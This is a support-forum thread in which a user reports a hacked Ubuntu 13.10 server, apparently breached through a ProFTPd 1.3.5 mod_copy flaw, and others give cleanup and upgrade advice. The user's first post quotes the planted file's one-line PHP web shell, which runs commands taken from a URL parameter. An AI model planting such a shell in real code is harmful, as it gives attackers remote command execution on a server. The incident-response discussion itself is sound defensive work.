My server has been hacked help

Hi every one i log to my server today and i see new file created i don’t know who created this file
name of file d.php content of file
proftpd <?php passthru($_GET['cmd']);echo 'm3rg3';?>
and i found backdoor perl can anyone help me i’m using webmine and ubuntu
i see in log lot of attack from china can any one explain to me what happen


Yeah, unfortunately, that kind of thing can happen. It’s likely that the attacker broke in through a vulnerability in a web app, or maybe they guessed one of the passwords for an account in your web app.

First, you’ll want to look around and file any files that don’t belong there.

You can then look at their timestamps, and match that to activity in the Apache access log for that domain.

That may help you identify how they broke in.

You’d definitely want to make sure your web app is fully up to date, along with any plugins it’s running.



Drop me a line on Skype tomorrow (Monday) and I’ll see what I can do to help you.

Best Regards, Peter Knowles TPN Solutions

Phone: 604-782-9342
Skype: tpnsupport

Ask me about my new support plans which include a FREE copy of Virtualmin Pro!!!

Hi thanks for reply i know but i’m not using any web app and i think i find the exploit it’s porftpd exploit
ProFTPd 1.3.5 - File Copy - Exploits
actualy i disable proftpd
last proftpd log
2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost ([]): FTP session opened.
2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost ([]): USER ftpuser: no such user found from [] to ::ffff:
2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost ([]): Login timeout exceeded, disconnected
2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost ([]): Session timed out, disconnected
2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost ([]): FTP session closed.


It sounds like you disabled ProFTPd – that’s good if you think that’s the issue, you may want to make sure that mod_copy is disabled in ProFTPd.

What distro/version is it that you’re using there though?


Operating system : Ubuntu Linux 13.10
Webmin version : 1.760

Ah, Ubuntu 13.10 reached it’s end of life over a year ago. So it’s no longer receiving any updates, including security updates.

There are likely a number of vulnerabilities on your server now.

We’d highly recommend upgrading to a current distribution.

When using Ubuntu, we recommend the Ubuntu LTS releases, as they’re supported for 5 years.